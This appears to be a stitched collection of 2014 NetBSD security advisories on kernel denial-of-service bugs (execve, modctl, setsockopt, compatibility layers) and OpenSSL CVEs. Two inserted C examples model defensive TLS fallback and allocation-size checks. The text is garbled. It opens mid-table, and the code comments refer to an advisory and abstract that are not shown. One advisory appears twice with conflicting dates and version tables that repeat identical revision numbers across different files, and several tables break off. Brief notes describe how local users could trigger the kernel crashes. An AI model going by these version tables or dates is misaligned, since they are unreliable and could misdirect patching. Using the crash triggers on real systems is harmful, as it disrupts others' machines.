ssl/t1_enc.c                1.11    1.10.2.1
ssl/t1_lib.c                1.14    1.13.2.1
ssl/tls1.h                  1.2     1.1.1.5.2.1
File
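The "SSL 3.0 Fallback protection" the abstract mentions is a server-side decision: when a ClientHello carries the TLS_FALLBACK_SCSV signalling suite but offers a lower version than the server could speak, the server refuses with an inappropriate_fallback alert (RFC 7507). The following is an added example, not OpenSSL or NetBSD code, that models that decision on a minimal ClientHello body; all function, struct and constant names are this example's own, and the suite lists at the end are constructed samples.

```c
/* Added example, not OpenSSL or NetBSD code: the server-side check that
 * TLS_FALLBACK_SCSV (RFC 7507) adds, applied to a minimal ClientHello body.
 * All names are this example's own; the suite lists are constructed. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TLS_FALLBACK_SCSV 0x5600u   /* signalling cipher suite, RFC 7507 */
#define SSL3_VERSION      0x0300u
#define TLS1_0_VERSION    0x0301u
#define TLS1_2_VERSION    0x0303u

enum hello_verdict {
    HELLO_MALFORMED = -1,
    HELLO_ACCEPT = 0,
    HELLO_PROTOCOL_VERSION = 70,        /* TLS alert protocol_version */
    HELLO_INAPPROPRIATE_FALLBACK = 86   /* TLS alert inappropriate_fallback */
};

/* The leading fields of a ClientHello body: client_version(2), random(32),
 * session_id<0..32>, cipher_suites<2..2^16-2>; later fields are ignored. */
struct client_hello {
    unsigned       client_version;
    const uint8_t *suites;      /* points into the parsed buffer */
    size_t         suites_len;  /* in bytes, always even */
};

/* Write a ClientHello body to out (needs 37 + 2*n bytes); returns its length. */
size_t build_client_hello(uint8_t *out, unsigned version,
                          const uint16_t *suites, size_t n)
{
    size_t i, p = 0;
    out[p++] = (uint8_t)(version >> 8);
    out[p++] = (uint8_t)version;
    memset(out + p, 0x42, 32); p += 32;     /* constructed "random" */
    out[p++] = 0;                           /* empty session_id */
    out[p++] = (uint8_t)((2 * n) >> 8);
    out[p++] = (uint8_t)(2 * n);
    for (i = 0; i < n; i++) {
        out[p++] = (uint8_t)(suites[i] >> 8);
        out[p++] = (uint8_t)suites[i];
    }
    return p;
}

/* Bounds-checked parse; returns 0 on success, -1 on a malformed body. */
int parse_client_hello(const uint8_t *buf, size_t len, struct client_hello *h)
{
    size_t p, sid_len, cs_len;
    if (len < 35) return -1;
    h->client_version = ((unsigned)buf[0] << 8) | buf[1];
    p = 34;
    sid_len = buf[p++];
    if (sid_len > 32 || len - p < sid_len) return -1;
    p += sid_len;
    if (len - p < 2) return -1;
    cs_len = ((size_t)buf[p] << 8) | buf[p + 1];
    p += 2;
    if (cs_len < 2 || cs_len % 2 != 0 || len - p < cs_len) return -1;
    h->suites = buf + p;
    h->suites_len = cs_len;
    return 0;
}

static int suites_contain(const struct client_hello *h, unsigned suite)
{
    size_t i;
    for (i = 0; i + 1 < h->suites_len; i += 2)
        if ((((unsigned)h->suites[i] << 8) | h->suites[i + 1]) == suite)
            return 1;
    return 0;
}

/* server_min/server_max: lowest and highest versions this server speaks.
 * server_min = TLS1_0_VERSION is the advisory's "disable SSLv3" advice. */
enum hello_verdict check_client_hello(const struct client_hello *h,
                                      unsigned server_min, unsigned server_max)
{
    if (h->client_version < server_min)
        return HELLO_PROTOCOL_VERSION;
    /* The SCSV marks a downgrade retry. If this server could have spoken a
     * higher version than the client now offers, the earlier failure was not
     * ours, so something on the path is forcing the downgrade: refuse it. */
    if (h->client_version < server_max && suites_contain(h, TLS_FALLBACK_SCSV))
        return HELLO_INAPPROPRIATE_FALLBACK;
    return HELLO_ACCEPT;
}

/* Build, parse and check a hello in one step (at most 8 suites). */
int verdict_for(unsigned version, const uint16_t *suites, size_t n,
                unsigned server_min, unsigned server_max)
{
    uint8_t buf[37 + 2 * 8];
    struct client_hello h;
    size_t len;
    if (n > 8) return HELLO_MALFORMED;
    len = build_client_hello(buf, version, suites, n);
    if (parse_client_hello(buf, len, &h) != 0) return HELLO_MALFORMED;
    return (int)check_client_hello(&h, server_min, server_max);
}

/* Constructed suite lists: a fallback retry carries the SCSV, a first try does not. */
const uint16_t suites_fallback[2] = { TLS_FALLBACK_SCSV, 0x002f };
const uint16_t suites_plain[1]    = { 0x002f };   /* TLS_RSA_WITH_AES_128_CBC_SHA */
```

Note that an SSLv3 hello without the SCSV is still accepted by a server whose server_min is SSL3_VERSION, which is why the advisory's first recommendation is to disable SSLv3 outright rather than rely on the SCSV alone.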
NetBSD Security Advisory 2014-009: Multiple vulnerabilities in the execve system call
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2014-009
                 =================================

Topic:          Multiple vulnerabilities in the execve system call

Version:        NetBSD-current:         source prior to Fri, Feb 14th 2014
                NetBSD 6.1 - 6.1.4:     affected
                NetBSD 6.0 - 6.0.4:     affected
                NetBSD 6.0.5:           not affected
                NetBSD 5.1 - 5.1.4:     not affected
                NetBSD 5.2 - 5.2.2:     not affected

Severity:       Local DoS

Fixed:          NetBSD-current:         Fri, Feb 14th 2014
                NetBSD-6-0 branch:      Fri, Feb 14th 2014
                NetBSD-6-1 branch:      Fri, Feb 14th 2014
                NetBSD-6 branch:        Fri, Feb 14th 2014

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

The execve system call is affected by two vulnerabilities:

1) A memory leak in the kernel could cause a local (un)privileged user to
   use up kernel memory via a bogus ELF binary, and thus to freeze - or
   eventually panic - the system.

2) A bug in the kernel could lead to a use-after-free condition when
   loading a binary or a script, which would allow a local (un)privileged
   user to crash the system.

Technical Details
=================

1) When trying to execute an ELF binary, the kernel looks up the
   corresponding interpreter (in the case of native dynamic ELF binaries:
   the dynamic linker ld.elf_so). If this interpreter cannot be accessed
   appropriately, or if it is bogus, a structure allocated to hold special
   information on this interpreter was not freed. If a standard toolchain
   is installed, a local user can easily create such broken binaries by
   passing the -dynamic-linker switch to the linker.

2) When executing a binary via execve(), the kernel computes the new user
   stack size, and returns an error if this size exceeds the maximum
   architecture-defined stack size or the maximum stack size allowed by
   the calling process through rlimit. However, the variable in charge of
   holding the error code returned was not properly initialised, causing
   the kernel to keep setting up the new process environment and use data
   that was already freed. Both the new stack size and the rlimit stack
   size are approximately user-controllable, which makes it easy to
   trigger from a local user.

Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.
The following instructions briefly summarise how to upgrade your
kernel. In these instructions, replace:

  ARCH     with your architecture (from uname -m),
  KERNCONF with the name of your kernel configuration file and
  VERSION  with the file version below

File versions containing the fixes:

FILE                    HEAD    netbsd-6    netbsd-6-1      netbsd-6-0
----                    ----    --------    ----------      ----------
sys/kern/exec_elf.c     1.55    1.37.2.2    1.37.2.1.6.1    1.37.2.1.4.1
sys/kern/kern_exec.c    1.403   1.339.2.9   1.339.2.6.2.2   1.339.2.5.4.3

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P -r VERSION sys/kern/exec_elf.c
        # cvs update -d -P -r VERSION sys/kern/kern_exec.c
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        http://www.NetBSD.org/guide/en/chap-kernel.html

Thanks To
=========

Thanks to Maxime Villard, who found the issues and provided fixes.

Revision History
================

        2014-08-27      Initial release
        2014-09-08      Updated affected versions

More Information
================

Advisories may be updated as new information becomes available. The
most recent version of this advisory (PGP signed) can be found at
        http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-009.txt.asc

Information about NetBSD and NetBSD security can be found at
        http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ .

Copyright 2014, The NetBSD Foundation, Inc. All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2014-009.txt,v 1.4 2014/09/02 14:26:27 spz Exp $
NetBSD Security Advisory 2014-011: User-controlled memory allocation in the modctl system call
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2014-011
                 =================================

Topic:          User-controlled memory allocation in the modctl system call

Version:        NetBSD-current:         source prior to Thu, Jul 10th 2014
                NetBSD 6.1 - 6.1.4:     affected
                NetBSD 6.0 - 6.0.5:     affected
                NetBSD 5.1 - 5.1.4:     affected
                NetBSD 5.2 - 5.2.2:     affected

Severity:       Local DoS

Fixed:          NetBSD-current:         Thu, Jul 10th 2014
                NetBSD-6-1 branch:      Mon, Jul 14th 2014
                NetBSD-6-0 branch:      Mon, Jul 14th 2014
                NetBSD-6 branch:        Mon, Jul 14th 2014
                NetBSD-5.2 branch:      Mon, Jul 14th 2014
                NetBSD-5.1 branch:      Mon, Jul 14th 2014
                NetBSD-5 branch:        Mon, Jul 14th 2014

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

Due to missing input validation checks, a local (un)privileged user could
cause the kernel to perform a zero-sized or unbounded memory allocation,
resulting in a crash.

Technical Details
=================

The modctl system call takes as second argument a buffer which is
represented as a structure when loading a kernel module. This structure
indicates special information on how to load a module, including a string
pointer and the length of the string pointed to. A kernel buffer of the
same size is allocated, but no check was performed to ensure the size is
neither too low nor too high, thus allowing a local user to crash the
system.

Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.
The following instructions briefly summarise how to upgrade your
kernel. In these instructions, replace:

  ARCH     with your architecture (from uname -m),
  KERNCONF with the name of your kernel configuration file and
  VERSION  with the file version below

File versions containing the fixes:

FILE                    HEAD   netbsd-6   netbsd-6-1  netbsd-6-0  netbsd-5  netbsd-5-2   netbsd-5-1
----                    ----   --------   ----------  ----------  --------  ----------   ----------
sys/kern/sys_module.c   1.15   1.13.8.1   1.13.14.1   1.13.12.1   1.8.4.2   1.8.4.1.6.1  1.8.4.1.2.1

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P -r VERSION sys/kern/sys_module.c
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        http://www.NetBSD.org/guide/en/chap-kernel.html

Thanks To
=========

Thanks to Maxime Villard, who found the issue and provided a fix.

Revision History
================

        2014-08-27      Initial release

More Information
================

Advisories may be updated as new information becomes available. The
most recent version of this advisory (PGP signed) can be found at
        http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-011.txt.asc

Information about NetBSD and NetBSD security can be found at
        http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ .

Copyright 2014, The NetBSD Foundation, Inc. All Rights Reserved.
Redistribution permitted only in full, unmodified form.
$NetBSD: NetBSD-SA2014-011.txt,v 1.3 2014/08/30 07:00:29 maxv Exp $
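Both this advisory (modctl) and NetBSD-SA2014-014 (mount) describe the same shape of bug: a user-chosen size is handed to the kernel allocator unchecked, and in the mount case the size later given to kmem_free had meanwhile been modified by the file system. The following added example, which is not NetBSD kernel code, models the corrected syscall path in user space: the length is bounded before allocation, a NULL argument buffer is only accepted by file systems that declare they need none (modeled here as a flag in the hypothetical struct fs_ops), and the size used to free is a variable the file system never sees. MOUNT_DATA_MAXLEN, do_mount, the kmem_*_model helpers and both file systems are this example's own; sample_args is a constructed buffer.

```c
/* Added example, not NetBSD kernel code: a user-space model of the checks
 * that NetBSD-SA2014-014 (mount) and NetBSD-SA2014-011 (modctl) describe as
 * missing. MOUNT_DATA_MAXLEN, struct fs_ops, do_mount, the kmem_*_model
 * helpers and both file systems are this example's own; sample_args is constructed. */
#include <errno.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical upper bound on a user-supplied argument buffer. Without one,
 * the caller of mount(2) or modctl(2) picks the kernel allocation size. */
#define MOUNT_DATA_MAXLEN 4096

/* Model of kmem_alloc()/kmem_free(): the size given to kmem_free() must be
 * the size allocated. Instead of corrupting allocator state, count mismatches. */
static size_t kmem_last_len;   /* size of the single live allocation */
static int    kmem_bad_frees;  /* kmem_free() calls with the wrong size */

static void *kmem_alloc_model(size_t len)
{
    kmem_last_len = len;
    return malloc(len);
}

static void kmem_free_model(void *p, size_t len)
{
    if (len != kmem_last_len)
        kmem_bad_frees++;
    free(p);
}

int kmem_mismatched_frees(void) { return kmem_bad_frees; }

/* A file system's mount hook. It gets its own copy of the length and may
 * change it; data is NULL only for file systems that declare they need none. */
struct fs_ops {
    const char *name;
    int         needs_data;                   /* 1: NULL data is an error */
    int       (*mount)(void *data, size_t *data_len);
};

/* The validation the advisories say was missing: zero means a zero-sized
 * allocation, unbounded lets a local user exhaust kernel memory. */
int mount_data_len_ok(size_t data_len)
{
    return data_len > 0 && data_len <= MOUNT_DATA_MAXLEN;
}

/* Model of the syscall path; returns 0 or an errno value. */
int do_mount(const struct fs_ops *fs, const void *udata, size_t data_len)
{
    void  *kdata;
    size_t alloc_len;   /* what we allocated; the only size used to free */
    size_t fs_len;      /* the file system's copy, which it may modify */
    int    error;

    if (udata == NULL) {
        if (fs->needs_data)
            return EINVAL;  /* this fs would dereference NULL unconditionally */
        fs_len = 0;
        return fs->mount(NULL, &fs_len);
    }
    if (!mount_data_len_ok(data_len))
        return EINVAL;

    alloc_len = data_len;
    kdata = kmem_alloc_model(alloc_len);
    if (kdata == NULL)
        return ENOMEM;
    memcpy(kdata, udata, alloc_len);      /* stands in for copyin(9) */

    fs_len = alloc_len;
    error = fs->mount(kdata, &fs_len);

    /* Free with the size we recorded, never with the variable the file
     * system was allowed to touch (the kmem_free inconsistency in SA2014-014). */
    kmem_free_model(kdata, alloc_len);
    return error;
}

/* Hypothetical file system whose hook overwrites the length it was given,
 * as the advisory says some file systems did. */
static int clobbering_mount(void *data, size_t *data_len)
{
    (void)data;
    *data_len = 0;
    return 0;
}
const struct fs_ops clobbering_fs = { "clobberfs", 1, clobbering_mount };

/* Hypothetical file system that needs no argument buffer. */
static int nodata_mount(void *data, size_t *data_len)
{
    (void)data; (void)data_len;
    return 0;
}
const struct fs_ops nodata_fs = { "nodatafs", 0, nodata_mount };

const unsigned char sample_args[16] = { 0xde, 0xad, 0xbe, 0xef };  /* constructed */
```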
NetBSD Security Advisory 2014-012: Memory leak in the setsockopt system call
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2014-012
                 =================================

Topic:          Memory leak in the setsockopt system call

Version:        NetBSD-current:         source prior to Sat, Aug 16th 2014
                NetBSD 6.1 - 6.1.4:     affected
                NetBSD 6.0 - 6.0.5:     affected
                NetBSD 5.1 - 5.1.4:     affected
                NetBSD 5.2 - 5.2.2:     affected

Severity:       Local DoS

Fixed:          NetBSD-current:         Sat, Aug 16th 2014
                NetBSD-7 branch:        Sun, Aug 24th 2014
                NetBSD-6-0 branch:      Wed, Aug 27th 2014
                NetBSD-6-1 branch:      Wed, Aug 27th 2014
                NetBSD-6 branch:        Wed, Aug 27th 2014
                NetBSD-5.2 branch:      Wed, Aug 27th 2014
                NetBSD-5.1 branch:      Wed, Aug 27th 2014
                NetBSD-5 branch:        Wed, Aug 27th 2014

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

A memory leak in the kernel could allow a local user to use up kernel
memory via repeated calls to the setsockopt system call, and thus to
freeze - or eventually panic - the system.

Technical Details
=================

When calling the setsockopt system call on an ipv6 socket with specific
arguments, a kernel buffer allocated to temporarily hold the socket
option data was not freed. Performing such a call in a loop would cause
the kernel to run out of memory and eventually panic.

Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.
The following instructions briefly summarise how to upgrade your
kernel. In these instructions, replace:

  ARCH     with your architecture (from uname -m),
  KERNCONF with the name of your kernel configuration file and
  VERSION  with the file version below

File versions containing the fixes:

FILE                        HEAD    netbsd-7    netbsd-6    netbsd-6-1  netbsd-6-0
----                        ----    --------    --------    ----------  ----------
sys/netinet6/ip6_output.c   1.158   1.157.2.1   1.145.2.1   1.145.8.1   1.145.6.1

FILE                        netbsd-5    netbsd-5-2      netbsd-5-1
----                        --------    ----------      ----------
sys/netinet6/ip6_output.c   1.135.2.2   1.135.2.1.10.1  1.135.2.1.6.1

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P -r VERSION sys/netinet6/ip6_output.c
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        http://www.NetBSD.org/guide/en/chap-kernel.html

Thanks To
=========

Thanks to Maxime Villard for developing a code scanner which detected the
issue, and Ryota Ozaki for helping in developing a fix.

Revision History
================

        2014-09-08      Initial release

More Information
================

Advisories may be updated as new information becomes available. The
most recent version of this advisory (PGP signed) can be found at
        http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-012.txt.asc

Information about NetBSD and NetBSD security can be found at
        http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ .

Copyright 2014, The NetBSD Foundation, Inc. All Rights Reserved.
Redistribution permitted only in full, unmodified form.
$NetBSD: NetBSD-SA2014-012.txt,v 1.1 2014/09/08 21:18:53 tonnerre Exp $
NetBSD Security Advisory 2014-008: Multiple OpenSSL vulnerabilities (updated)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2014-008
                 =================================

Topic:          Multiple OpenSSL vulnerabilities

Version:        NetBSD-current:         prior to Aug 10th, 2014
                NetBSD 6.1 - 6.1.4:     affected
                NetBSD 6.0 - 6.0.5:     affected
                NetBSD 5.1 - 5.1.4:     partially affected
                NetBSD 5.2 - 5.2.2:     partially affected

Severity:       MitM, Remote Code Execution, Remote DoS, Local Information Leak

Fixed:          NetBSD-current:         Aug 10th, 2014
                NetBSD-6-0 branch:      Aug 16th, 2014
                NetBSD-6-1 branch:      Aug 16th, 2014
                NetBSD-6 branch:        Aug 16th, 2014
                NetBSD-5-2 branch:      Aug 28th, 2014
                NetBSD-5-1 branch:      Aug 28th, 2014
                NetBSD-5 branch:        Aug 28th, 2014

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

 - Information leak in pretty printing functions (CVE-2014-3508)
 - Double Free when processing DTLS packets (CVE-2014-3505)
 - DTLS memory exhaustion (CVE-2014-3506)
 - DTLS memory leak from zero-length fragments (CVE-2014-3507)
 - OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)
 - Race condition in ssl_parse_serverhello_tlsext (CVE-2014-3509)
 - OpenSSL TLS protocol downgrade attack (CVE-2014-3511)

only in NetBSD-6 and NetBSD-current:
 - Crash with SRP ciphersuite in Server Hello message (CVE-2014-5139)
 - SRP buffer overrun (CVE-2014-3512)

Technical Details
=================

See http://www.openssl.org/news/secadv_20140806.txt

Solutions and Workarounds
=========================

Update the OpenSSL libraries and make sure the old libssl and libcrypto
are no longer used.

From source:
------------

Update src and rebuild and install.

Note: OpenSSL in NetBSD-6 and NetBSD-current has been updated to
version 1.0.1i; updating the entire src tree is recommended.

From tarballs:
--------------

To obtain fixed binaries, fetch the appropriate base.tgz and comp.tgz
from a daily build later than the fix dates, from
http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/
with a date 20140828* or larger, and your release version and
architecture (e.g.
http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-6-1/201408280100Z/amd64/binary/sets/),
and then extract the files:

Shared libraries:
        tar xzpf base.tgz \*libssl\* \*libcrypto\*

And static libraries and linker config files:
        tar xzpf comp.tgz \*libssl\* \*libcrypto\*

Get the fixed library into use
------------------------------

Since the vulnerability is in a shared library, getting the old library
purged and the fixed one into use requires restarting all programs that
load libssl and libcrypto. The easiest way to do this is to reboot the
system.

Another method: using /bin/sh,

        ps ax -o pid | (while read pid; do \
                pmap $pid | egrep '(libssl|libcrypto)' && echo found $pid ;\
        done)

will find non-chrooted programs that have the affected libraries open;
restart them. sshd will not show up in this list since it runs chrooted
and re-exec'ed, but also needs to be restarted.

ldd programname will show the shared libraries a program is wont to use.

Lastly, remove the vulnerable libraries to make sure they won't get used
accidentally:

        rm /usr/lib/libssl.so.10.3 /lib/libcrypto.so.8.2 /usr/lib/libcrypto.so.8.2

Fixed versions
--------------

files relative to src/crypto/external/bsd/openssl/dist/ssl

branch       d1_both.c          t1_lib.c       s3_clnt.c      s23_srvr.c
------       ---------          --------       ---------      ----------
netbsd-6-0   1.1.1.4.4.1.4.3    1.5.4.1.4.3    1.4.4.1.4.3    1.1.1.3.10.1
netbsd-6-1   1.1.1.4.4.1.6.3    1.5.4.1.6.3    .4.4.1.6.3     1.1.1.3.18.1
netbsd-6     1.1.1.4.4.4        1.5.4.4        1.4.4.4        1.1.1.3.4.1
HEAD         1.1.1.9            1.13           1.10           1.1.1.4

files relative to src/crypto/external/bsd/openssl/dist/crypto

branch       asn1/a_object.c    objects/obj_dat.c   srp/srp_lib.c
------       ---------------    -----------------   -------------
netbsd-6-0   1.1.1.3.4.1.4.1    1.1.1.2.14.1        1.1.1.1.10.2
netbsd-6-1   1.1.1.3.4.1.6.1    1.1.1.2.22.1        1.1.1.1.18.2
netbsd-6     1.1.1.3.4.2        1.1.1.2.8.1         1.1.1.1.4.2
HEAD         1.1.1.5            1.1.1.3             1.1.1.3

files relative to crypto/dist/openssl/ssl

branch       d1_both.c      t1_lib.c       s3_clnt.c       s23_srvr.c
------       ---------      --------       ---------       ----------
netbsd-5-1   1.3.4.2.2.2    1.2.12.4       1.12.4.2.2.3    1.6.12.1
netbsd-5-2   1.3.4.2.6.2    1.2.4.3.2.1    1.12.4.3.4.2    1.6.2.1
netbsd-5     1.3.4.4        1.2.4.4        1.12.4.5        1.6.4.1

files relative to crypto/dist/openssl/crypto

branch       asn1/a_object.c    asn1/asn1.h
NetBSD Security Advisory 2014-008: Multiple OpenSSL vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2014-008
                 =================================

Topic:          Multiple OpenSSL vulnerabilities

Version:        NetBSD-current:         prior to Aug 10th, 2014
                NetBSD 6.1 - 6.1.4:     affected
                NetBSD 6.0 - 6.0.5:     affected
                NetBSD 5.1 - 5.1.4:     partially affected
                NetBSD 5.2 - 5.2.2:     partially affected

Severity:       MitM, Remote Code Execution, Remote DoS, Local Information Leak

Fixed:          NetBSD-current:         Aug 10th, 2014
                NetBSD-6-0 branch:      Aug 11th, 2014
                NetBSD-6-1 branch:      Aug 11th, 2014
                NetBSD-6 branch:        Aug 11th, 2014
                NetBSD-5-2 branch:      Aug 11th, 2014
                NetBSD-5-1 branch:      Aug 11th, 2014
                NetBSD-5 branch:        Aug 11th, 2014

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

 - Information leak in pretty printing functions (CVE-2014-3508)
 - Double Free when processing DTLS packets (CVE-2014-3505)
 - DTLS memory exhaustion (CVE-2014-3506)
 - DTLS memory leak from zero-length fragments (CVE-2014-3507)
 - OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)
 - Race condition in ssl_parse_serverhello_tlsext (CVE-2014-3509)
 - OpenSSL TLS protocol downgrade attack (CVE-2014-3511)

only in NetBSD-6 and NetBSD-current:
 - Crash with SRP ciphersuite in Server Hello message (CVE-2014-5139)
 - SRP buffer overrun (CVE-2014-3512)

Technical Details
=================

See http://www.openssl.org/news/secadv_20140806.txt

Solutions and Workarounds
=========================

Update the OpenSSL libraries and make sure the old libssl and libcrypto
are no longer used.

From source:
------------

Update src and rebuild and install.

Note: OpenSSL in NetBSD-6 and NetBSD-current has been updated to
version 1.0.1h; updating the entire src tree is recommended.

From tarballs:
--------------

To obtain fixed binaries, fetch the appropriate base.tgz and comp.tgz
from a daily build later than the fix dates, from
http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/
with a date 20140812* or larger, and your release version and
architecture (e.g.
http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-6-1/201408140100Z/amd64/binary/sets/),
and then extract the files:

Shared libraries:
        tar xzpf base.tgz \*libssl\* \*libcrypto\*

And static libraries and linker config files:
        tar xzpf comp.tgz \*libssl\* \*libcrypto\*

Get the fixed library into use
------------------------------

Since the vulnerability is in a shared library, getting the old library
purged and the fixed one into use requires restarting all programs that
load libssl and libcrypto. The easiest way to do this is to reboot the
system.

Another method: using /bin/sh,

        ps ax -o pid | (while read pid; do \
                pmap $pid | egrep '(libssl|libcrypto)' && echo found $pid ;\
        done)

will find non-chrooted programs that have the affected libraries open;
restart them. sshd will not show up in this list since it runs chrooted
and re-exec'ed, but also needs to be restarted.

ldd programname will show the shared libraries a program is wont to use.

Lastly, remove the vulnerable libraries to make sure they won't get used
accidentally:

        rm /usr/lib/libssl.so.10.3 /lib/libcrypto.so.8.2 /usr/lib/libcrypto.so.8.2

Fixed versions
--------------

files relative to src/crypto/external/bsd/openssl/dist/ssl

branch       d1_both.c          t1_lib.c       s3_clnt.c      s23_srvr.c
------       ---------          --------       ---------      ----------
netbsd-6-0   1.1.1.4.4.1.4.2    1.4.4.1.4.2    1.9.4.1.4.2    1.10.2.1.4.2
netbsd-6-1   1.1.1.4.4.1.6.2    1.4.4.1.6.2    1.9.4.1.6.2    1.10.2.1.6.2
netbsd-6     1.1.1.4.4.3        1.4.4.3        1.9.4.3        1.10.2.3
HEAD         1.1.1.8            1.9            1.16           1.16

files relative to src/crypto/external/bsd/openssl/dist/crypto

branch       asn1/a_object.c    objects/obj_dat.c   srp/srp_lib.c
------       ---------------    -----------------   -------------
netbsd-6-0   1.1.1.4.4.1.4.2    1.4.4.1.4.2         1.9.4.1.4.2
netbsd-6-1   1.1.1.4.4.1.6.2    1.4.4.1.6.2         1.9.4.1.6.2
netbsd-6     1.1.1.4.4.3        1.4.4.3             1.9.4.3
HEAD         1.1.1.8            1.9                 1.16

files relative to crypto/dist/openssl/ssl

branch       d1_both.c          t1_lib.c       s3_clnt.c      s23_srvr.c
------       ---------          --------       ---------      ----------
netbsd-5-1   1.1.1.4.4.1.4.2    1.4.4.1.4.2    1.9.4.1.4.2    1.10.2.1.4.2
netbsd-5-2   1.1.1.4.4.1.6.2    1.4.4.1.6.2    1.9.4.1.6.2    1.10.2.1.6.2
netbsd-5     1.1.1.4.4.3        1.4.4.3        1.9.4.3        1.10.2.3

files relative to crypto/dist/openssl/crypto

branch       asn1/a_object.c    objects/obj_dat.c   srp/srp_lib.c
NetBSD Security Advisory 2014-010: Multiple vulnerabilities in the compatibility layers
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2014-010
                 =================================

Topic:          Multiple vulnerabilities in the compatibility layers

Version:        NetBSD-current:         source prior to Tue, Apr 15th 2014
                NetBSD 6.1 - 6.1.4:     affected
                NetBSD 6.0 - 6.0.5:     affected
                NetBSD 5.1 - 5.1.4:     affected
                NetBSD 5.2 - 5.2.2:     affected

Severity:       Local DoS

Fixed:          NetBSD-current:         Tue, Apr 15th 2014
                NetBSD-6-0 branch:      Mon, Apr 21st 2014
                NetBSD-6-1 branch:      Mon, Apr 21st 2014
                NetBSD-6 branch:        Mon, Apr 21st 2014
                NetBSD-5-2 branch:      Wed, May 14th 2014
                NetBSD-5-1 branch:      Wed, May 14th 2014
                NetBSD-5 branch:        Wed, May 14th 2014

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

Four compatibility layers are affected by several vulnerabilities:

1) FreeBSD compatibility: NULL pointer dereference
2) NetBSD 32-bit compatibility: Zero-sized memory allocation
3) Digital UNIX (formerly OSF/1) compatibility: Zero-sized memory allocation
4) Linux and Linux 32-bit compatibility: User-controllable kernel memory
   array index.

Each of them allows a local user to crash the system.

Technical Details
=================

For more clarity, the four layers affected will be referred to as
COMPAT_xx, where xx is the emulated system.

1) Due to a programming mistake in COMPAT_FREEBSD, a simple call to the
   sched_getparam system call would cause the kernel to dereference a
   NULL pointer, and thus to crash.

2) Due to a missing input validation check in COMPAT_NETBSD32's kevent
   system call, a user could cause the kernel to perform a zero-sized
   memory allocation, resulting in a crash.

3) Due to a missing input validation check in COMPAT_OSF1's getdirentries
   system call, a user could cause the kernel to perform a zero-sized
   memory allocation, resulting in a crash.

4) Due to missing input validation checks in the COMPAT_LINUX and
   COMPAT_LINUX32 ELF binary loader, a specially-crafted binary could
   control a kernel memory array index - the address from which data is
   read. Attempting to read an unmapped memory page will cause the kernel
   to crash.

Solutions and Workarounds
=========================

-- Disable the compatibility modules --

You can achieve this with the modunload(8) tool. Please read the
appropriate manual page. For example, you can disable the Linux modules
by moving the kernel object files out of the way. These are located in:

        /stand/${MACHINE_ARCH}/${KERNEL_VERSION}/modules/compat_${NAME}/compat_${NAME}.kmod

and running the following command to unload them:

        # modunload compat_${NAME}

The modules have dependencies, so you need to unload them in the proper
order. You can also disable these modules by rebuilding your kernel
without the COMPAT_${NAME} options. Note however that this is to be
considered a temporary workaround, and you are strongly advised to fix
your system from source.

-- Fix from source --

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.
